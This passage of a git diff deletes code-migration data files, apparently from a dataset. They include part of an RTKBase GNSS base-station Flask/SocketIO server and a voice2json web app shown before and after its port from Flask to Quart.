rtk.state != "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=True, emit = True): - """ - check if an update exists - """ - new_release = {} - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = requests.get(source_url) - response = response.json() - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - - if emit: - socketio.emit("new release", json.dumps(new_release), namespace="/test") - - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update(emit=False).get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - try: - response = requests.get(update_url) - with open(update_archive, "wb") as f: - f.write(response.content) - except Exception as e: - print("Error: Can't download update - ", e) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" - -@app.before_request -def inject_release(): - g.version = rtkbaseconfig.get("general", "version") - -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(5) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff deleted file mode 100644 index 2f01ef9..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff +++ /dev/null @@ -1,225 +0,0 @@ -diff --git a/web/app.py b/web/app.py - index 6917d188b5e3fa43fce79b44d4e1ec161e1443ab..7ea7ddb8400775282e82c1adcb17b013f27ede2b 100644 - --- a/web/app.py - +++ b/web/app.py -@@ -17,15 +17,15 @@ from pathlib import Path - from typing import Optional, Dict, Any, Tuple, BinaryIO, List - - import pydash --from flask import Flask, request, render_template, send_from_directory, flash, send_file -+from quart import Quart, request, render_template, send_from_directory, flash, send_file - - # ----------------------------------------------------------------------------- - - profile_path: Optional[Path] = None - profile: Dict[str, Any] = {} - --# Flask application --app = Flask("voice2json") -+# Quart application -+app = Quart("voice2json") - app.secret_key = str(uuid4()) - - logger = logging.getLogger("app") -@@ -38,7 +38,7 @@ recording: bool = False - - - @app.route("/", methods=["GET", "POST"]) --def index(): -+async def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - -@@ -56,7 +56,8 @@ def index(): - wav_data: Optional[bytes] = None - - # Check if start/stopping recording -- if "record" in request.form: -+ form = await request.form -+ if "record" in form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") -@@ -91,18 +92,23 @@ def index(): - # Clean up - del record_file - record_file = None -- elif "upload" in request.form: -- if "wavfile" in request.files: -+ elif "upload" in form: -+ files = await request.files -+ if "wavfile" in files: - # Get WAV data from file upload -- wav_file = request.files["wavfile"] -+ wav_file = files["wavfile"] - wav_data = wav_file.read() - else: -- flash("No WAV file given", "danger") -- elif "recognize" in request.form: -+ await flash("No WAV file given", "danger") -+ elif "recognize" in form: - # Get sentence to recognize from form -- sentence = request.form["sentence"] -+ sentence = form["sentence"] - if len(sentence) == 0: -- flash("No sentence to recognize", "danger") -+ await flash("No sentence to recognize", "danger") -+ -+ transcribe_result = { -+ "text": sentence.strip() -+ } - - # --------------------------------------------------------------------- - -@@ -163,7 +169,7 @@ def index(): - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - -- return render_template( -+ return await render_template( - "index.html", - profile=profile, - pydash=pydash, -@@ -179,20 +185,21 @@ def index(): - - - @app.route("/sentences", methods=["GET", "POST"]) --def sentences(): -+async def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences -- sentences_text = request.form["sentences"] -+ form = await request.form -+ sentences_text = form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - -- return render_template( -+ return await render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - -@@ -201,7 +208,7 @@ def sentences(): - - - @app.route("/words", methods=["GET", "POST"]) --def words(): -+async def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. - Re-trains when custom words are saved.""" - -@@ -209,17 +216,18 @@ def words(): - word = "" - - if request.method == "POST": -- action = request.form["action"] -+ form = await request.form -+ action = form["action"] - - if action == "custom words": - # Save custom words -- custom_words_text = request.form["custom_words"] -+ custom_words_text = form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation -- word = request.form["word"] -- is_speak = "speak" in request.form -+ word = form["word"] -+ is_speak = "speak" in form - if len(word) > 0: - if is_speak: - # Speak pronunciation -@@ -232,14 +240,14 @@ def words(): - - # Display guess(s) - for line in result: -- flash(line.strip(), "info") -+ await flash(line.strip(), "info") - else: -- flash("No word given", "danger") -+ await flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - -- return render_template( -+ return await render_template( - "words.html", - profile=profile, - pydash=pydash, -@@ -258,12 +266,13 @@ atexit.register(lambda: espeak_cache_dir.cleanup()) - - - @app.route("/phonemes", methods=["GET", "POST"]) --def phonemes(): -+async def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": -- for var_name, var_value in request.form.items(): -+ form = await request.form -+ for var_name, var_value in form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() -@@ -272,7 +281,7 @@ def phonemes(): - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - -- flash(f"Wrote {phoneme_map_path}", "success") -+ await flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): -@@ -353,7 +362,7 @@ def phonemes(): - - # logger.debug(phoneme_examples) - -- return render_template( -+ return await render_template( - "phonemes.html", - sorted=sorted, - profile=profile, -@@ -364,7 +373,7 @@ def phonemes(): - - - @app.route("/pronounce/", methods=["GET"]) --def pronounce(name): -+async def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - -@@ -424,13 +433,13 @@ def voice2json(*args, text=True, input=None, stderr=None): - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - --def do_retrain(): -+async def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time -- flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") -+ await flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - -@@ -448,7 +457,7 @@ def do_retrain(): - warn_lines.append(line) - - if warn_lines is not None: -- flash("\n".join(warn_lines), "warning") -+ await flash("\n".join(warn_lines), "warning") - - - # ----------------------------------------------------------------------------- diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py deleted file mode 100644 index 18ab56e..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py +++ /dev/null @@ -1,480 +0,0 @@ -#!/usr/bin/env python3 -import io -import re -import json -import argparse -import subprocess -import logging -import time -import shlex -import tempfile -import threading -import wave -import atexit -import base64 -from uuid import uuid4 -from pathlib import Path -from typing import Optional, Dict, Any, Tuple, BinaryIO, List - -import pydash -from flask import Flask, request, render_template, send_from_directory, flash, send_file - -# ----------------------------------------------------------------------------- - -profile_path: Optional[Path] = None -profile: Dict[str, Any] = {} - -# Flask application -app = Flask("voice2json") -app.secret_key = str(uuid4()) - -logger = logging.getLogger("app") - -# ----------------------------------------------------------------------------- - -record_proc: Optional[subprocess.Popen] = None -record_file: Optional[BinaryIO] = None -recording: bool = False - - -@app.route("/", methods=["GET", "POST"]) -def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - - # Sentence to recognize - sentence: str = "" - - # Recognized intent - intent: Optional[Dict[str, Any]] = None - - # List of (word, entity) tuples from recognized intent - words_entities: List[Tuple[str, Dict[str, Any]]] = [] - - if request.method == "POST": - # WAV audio data - wav_data: Optional[bytes] = None - - # Check if start/stopping recording - if "record" in request.form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") - record_command = shlex.split( - pydash.get(profile, "audio.record-command") - ) - logger.debug(record_command) - - record_proc = subprocess.Popen(record_command, stdout=record_file) - recording = True - else: - # Stop recording - record_proc.terminate() - record_proc.wait() - record_proc = None - recording = False - - # Read raw audio data from temp file - record_file.seek(0) - raw_audio_data = record_file.read() - - # Convert to WAV data - with io.BytesIO() as wav_buffer: - with wave.open(wav_buffer, mode="wb") as wav_file: - wav_file.setframerate(16000) - wav_file.setsampwidth(2) - wav_file.setnchannels(1) - wav_file.writeframesraw(raw_audio_data) - - wav_data = wav_buffer.getvalue() - - # Clean up - del record_file - record_file = None - elif "upload" in request.form: - if "wavfile" in request.files: - # Get WAV data from file upload - wav_file = request.files["wavfile"] - wav_data = wav_file.read() - else: - flash("No WAV file given", "danger") - elif "recognize" in request.form: - # Get sentence to recognize from form - sentence = request.form["sentence"] - if len(sentence) == 0: - flash("No sentence to recognize", "danger") - - # --------------------------------------------------------------------- - - if wav_data is not None: - # Transcribe WAV - logger.debug(f"Transcribing {len(wav_data)} byte(s)") - transcribe_result = json.load( - voice2json("transcribe-wav", text=False, input=wav_data) - ) - sentence = transcribe_result.get( - "raw_text", transcribe_result.get("text", "") - ) - - if len(sentence) > 0: - # Recognize text - recognize_result = json.load( - voice2json("recognize-intent", input=json.dumps(transcribe_result)) - ) - intent = recognize_result - - # Process intent - if intent is not None: - char_index = 0 - - # Map from start character index to entity - start_to_entity = { - e.get("raw_start", -1): e for e in intent.get("entities", []) - } - entity = None - - # Go through words (tokens) - for token in intent.get("raw_tokens", intent.get("tokens", [])): - if entity and (char_index >= entity.get("raw_end", -1)): - # Entity has finished - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - entity = None - - if entity is None: - # Entity is starting - entity = start_to_entity.get(char_index) - - if entity is None: - # Regular word - words_entities.append((token, None)) - - char_index += len(token) + 1 # +1 for space - - if entity: - # Catch entity at end of sentence - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - - # ------------------------------------------------------------------------- - - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - - return render_template( - "index.html", - profile=profile, - pydash=pydash, - sentence=sentence, - intent=intent, - intent_str=intent_str, - words_entities=words_entities, - recording=recording, - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/sentences", methods=["GET", "POST"]) -def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences - sentences_text = request.form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - - return render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/words", methods=["GET", "POST"]) -def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. - Re-trains when custom words are saved.""" - - custom_words_path = Path(pydash.get(profile, "training.custom-words-file")) - word = "" - - if request.method == "POST": - action = request.form["action"] - - if action == "custom words": - # Save custom words - custom_words_text = request.form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation - word = request.form["word"] - is_speak = "speak" in request.form - if len(word) > 0: - if is_speak: - # Speak pronunciation - result = voice2json("pronounce-word", "--nbest", "1", word) - else: - # Get multiple guesses - result = voice2json( - "pronounce-word", "--quiet", "--nbest", "3", word - ) - - # Display guess(s) - for line in result: - flash(line.strip(), "info") - else: - flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - - return render_template( - "words.html", - profile=profile, - pydash=pydash, - custom_words=custom_words_text, - word=word, - ) - - -# ----------------------------------------------------------------------------- - -espeak_words = {} -wav_cache = {} -espeak_cache_dir = tempfile.TemporaryDirectory() - -atexit.register(lambda: espeak_cache_dir.cleanup()) - - -@app.route("/phonemes", methods=["GET", "POST"]) -def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": - for var_name, var_value in request.form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() - - with open(phoneme_map_path, "w") as phoneme_map_file: - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - - flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): - if key.startswith("phoneme_"): - wav_cache.pop(key, None) - else: - # Load map from dictionary phonemes to eSpeak phonemes - with open(phoneme_map_path, "r") as phoneme_map_file: - for line in phoneme_map_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - dict_phoneme, espeak_phoneme = re.split("\s+", line, maxsplit=1) - phoneme_map[dict_phoneme] = espeak_phoneme - - # Load word examples for each phoneme - phoneme_examples_path = Path( - pydash.get(profile, "speech-to-text.phoneme-examples-file") - ) - voice = pydash.get(profile, "text-to-speech.espeak.voice", "") - phoneme_examples = {} - - with open(phoneme_examples_path, "r") as phoneme_examples_file: - for line in phoneme_examples_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - phoneme, word, pronunciation = re.split(r"\s+", line, maxsplit=2) - espeak_phoneme_str = "".join(phoneme_map[p] for p in pronunciation.split()) - - word_cache_key = f"word_{word}" - phoneme_cache_key = ( - "phoneme_" - + phoneme - + "_" - + base64.b64encode(espeak_phoneme_str.encode()).decode() - ) - - if word_cache_key not in wav_cache: - # Speak whole word - wav_path = Path(espeak_cache_dir.name) / f"{word_cache_key}.wav" - espeak_cmd = ["espeak-ng", "--sep= ", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(word) - logger.debug(espeak_cmd) - result = subprocess.check_output( - espeak_cmd, universal_newlines=True - ).strip() - - espeak_word_str = result.replace("'", "") - espeak_words[word] = espeak_word_str - wav_cache[word_cache_key] = wav_path - - if phoneme_cache_key not in wav_cache: - # Speak mapped phonemes - wav_path = Path(espeak_cache_dir.name) / f"{phoneme_cache_key}.wav" - espeak_cmd = ["espeak-ng", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(f"[[{espeak_phoneme_str}]]") - logger.debug(espeak_cmd) - subprocess.check_call(espeak_cmd) - wav_cache[phoneme_cache_key] = wav_path - - actual_espeak = " ".join(phoneme_map[p] for p in pronunciation.split()) - phoneme_examples[phoneme] = { - "word": word, - "pronunciation": pronunciation, - "expected": espeak_words[word], - "actual": actual_espeak, - "phoneme_key": phoneme_cache_key, - } - - # logger.debug(phoneme_examples) - - return render_template( - "phonemes.html", - sorted=sorted, - profile=profile, - pydash=pydash, - phoneme_examples=phoneme_examples, - phoneme_map=phoneme_map, - ) - - -@app.route("/pronounce/", methods=["GET"]) -def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - - -# ----------------------------------------------------------------------------- -# Static Routes -# ----------------------------------------------------------------------------- - - -@app.route("/css/", methods=["GET"]) -def css(filename): - return send_from_directory("css", filename) - - -@app.route("/js/", methods=["GET"]) -def js(filename): - return send_from_directory("js", filename) - - -@app.route("/img/", methods=["GET"]) -def img(filename): - return send_from_directory("img", filename) - - -@app.errorhandler(Exception) -def handle_error(err) -> Tuple[str, int]: - logger.exception(err) - return (str(err), 500) - - -# ----------------------------------------------------------------------------- -# Utility Methods -# ----------------------------------------------------------------------------- - - -def voice2json(*args, text=True, input=None, stderr=None): - """Calls voice2json with the given arguments and current profile.""" - global profile_path - command = ["voice2json"] - - if profile_path is not None: - # Add profile - command.extend(["--profile", str(profile_path)]) - - command.extend(list(args)) - logger.debug(command) - - if text: - # Text-based I/O - return io.StringIO( - subprocess.check_output( - command, universal_newlines=True, input=input, stderr=stderr - ) - ) - else: - # Binary I/O - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - -def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time - flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - - warn_lines = None - for line in result.splitlines(): - line = line.strip() - if line.startswith("-") or line.startswith("."): - continue - - if "unknown" in line: - warn_lines = [] - line = line + ":" - - if warn_lines is not None: - warn_lines.append(line) - - if warn_lines is not None: - flash("\n".join(warn_lines), "warning") - - -# ----------------------------------------------------------------------------- - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--debug", action="store_true", help="Enable DEBUG mode") - parser.add_argument( - "--port", type=int, default=5000, help="Web server port (default: 5000)" - ) - parser.add_argument( - "--host", default="127.0.0.1", help="Web server host (default: 127.0.0.1)" - ) - parser.add_argument("--profile", help="Path to voice2json profile") - args = parser.parse_args() - - if args.debug: - logging.basicConfig(level=logging.DEBUG) - - logger.debug(args) - - if args.profile is not None: - profile_path = Path(args.profile) - - # Get profile as JSON from voice2json - profile = json.load(voice2json("print-profile")) - - # Start web server - app.run(port=args.port, host=args.host, debug=args.debug) diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py deleted file mode 100644 index 1cc105b..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py +++ /dev/null @@ -1,489 +0,0 @@ -#!/usr/bin/env python3 -import io -import re -import json -import argparse -import subprocess -import logging -import time -import shlex -import tempfile -import threading -import wave -import atexit -import base64 -from uuid import uuid4 -from pathlib import Path -from typing import Optional, Dict, Any, Tuple, BinaryIO, List - -import pydash -from quart import Quart, request, render_template, send_from_directory, flash, send_file - -# ----------------------------------------------------------------------------- - -profile_path: Optional[Path] = None -profile: Dict[str, Any] = {} - -# Quart application -app = Quart("voice2json") -app.secret_key = str(uuid4()) - -logger = logging.getLogger("app") - -# ----------------------------------------------------------------------------- - -record_proc: Optional[subprocess.Popen] = None -record_file: Optional[BinaryIO] = None -recording: bool = False - - -@app.route("/", methods=["GET", "POST"]) -async def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - - # Sentence to recognize - sentence: str = "" - - # Recognized intent - intent: Optional[Dict[str, Any]] = None - - # List of (word, entity) tuples from recognized intent - words_entities: List[Tuple[str, Dict[str, Any]]] = [] - - if request.method == "POST": - # WAV audio data - wav_data: Optional[bytes] = None - - # Check if start/stopping recording - form = await request.form - if "record" in form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") - record_command = shlex.split( - pydash.get(profile, "audio.record-command") - ) - logger.debug(record_command) - - record_proc = subprocess.Popen(record_command, stdout=record_file) - recording = True - else: - # Stop recording - record_proc.terminate() - record_proc.wait() - record_proc = None - recording = False - - # Read raw audio data from temp file - record_file.seek(0) - raw_audio_data = record_file.read() - - # Convert to WAV data - with io.BytesIO() as wav_buffer: - with wave.open(wav_buffer, mode="wb") as wav_file: - wav_file.setframerate(16000) - wav_file.setsampwidth(2) - wav_file.setnchannels(1) - wav_file.writeframesraw(raw_audio_data) - - wav_data = wav_buffer.getvalue() - - # Clean up - del record_file - record_file = None - elif "upload" in form: - files = await request.files - if "wavfile" in files: - # Get WAV data from file upload - wav_file = files["wavfile"] - wav_data = wav_file.read() - else: - await flash("No WAV file given", "danger") - elif "recognize" in form: - # Get sentence to recognize from form - sentence = form["sentence"] - if len(sentence) == 0: - await flash("No sentence to recognize", "danger") - - transcribe_result = { - "text": sentence.strip() - } - - # --------------------------------------------------------------------- - - if wav_data is not None: - # Transcribe WAV - logger.debug(f"Transcribing {len(wav_data)} byte(s)") - transcribe_result = json.load( - voice2json("transcribe-wav", text=False, input=wav_data) - ) - sentence = transcribe_result.get( - "raw_text", transcribe_result.get("text", "") - ) - - if len(sentence) > 0: - # Recognize text - recognize_result = json.load( - voice2json("recognize-intent", input=json.dumps(transcribe_result)) - ) - intent = recognize_result - - # Process intent - if intent is not None: - char_index = 0 - - # Map from start character index to entity - start_to_entity = { - e.get("raw_start", -1): e for e in intent.get("entities", []) - } - entity = None - - # Go through words (tokens) - for token in intent.get("raw_tokens", intent.get("tokens", [])): - if entity and (char_index >= entity.get("raw_end", -1)): - # Entity has finished - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - entity = None - - if entity is None: - # Entity is starting - entity = start_to_entity.get(char_index) - - if entity is None: - # Regular word - words_entities.append((token, None)) - - char_index += len(token) + 1 # +1 for space - - if entity: - # Catch entity at end of sentence - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - - # ------------------------------------------------------------------------- - - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - - return await render_template( - "index.html", - profile=profile, - pydash=pydash, - sentence=sentence, - intent=intent, - intent_str=intent_str, - words_entities=words_entities, - recording=recording, - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/sentences", methods=["GET", "POST"]) -async def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences - form = await request.form - sentences_text = form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - - return await render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/words", methods=["GET", "POST"]) -async def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. - Re-trains when custom words are saved.""" - - custom_words_path = Path(pydash.get(profile, "training.custom-words-file")) - word = "" - - if request.method == "POST": - form = await request.form - action = form["action"] - - if action == "custom words": - # Save custom words - custom_words_text = form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation - word = form["word"] - is_speak = "speak" in form - if len(word) > 0: - if is_speak: - # Speak pronunciation - result = voice2json("pronounce-word", "--nbest", "1", word) - else: - # Get multiple guesses - result = voice2json( - "pronounce-word", "--quiet", "--nbest", "3", word - ) - - # Display guess(s) - for line in result: - await flash(line.strip(), "info") - else: - await flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - - return await render_template( - "words.html", - profile=profile, - pydash=pydash, - custom_words=custom_words_text, - word=word, - 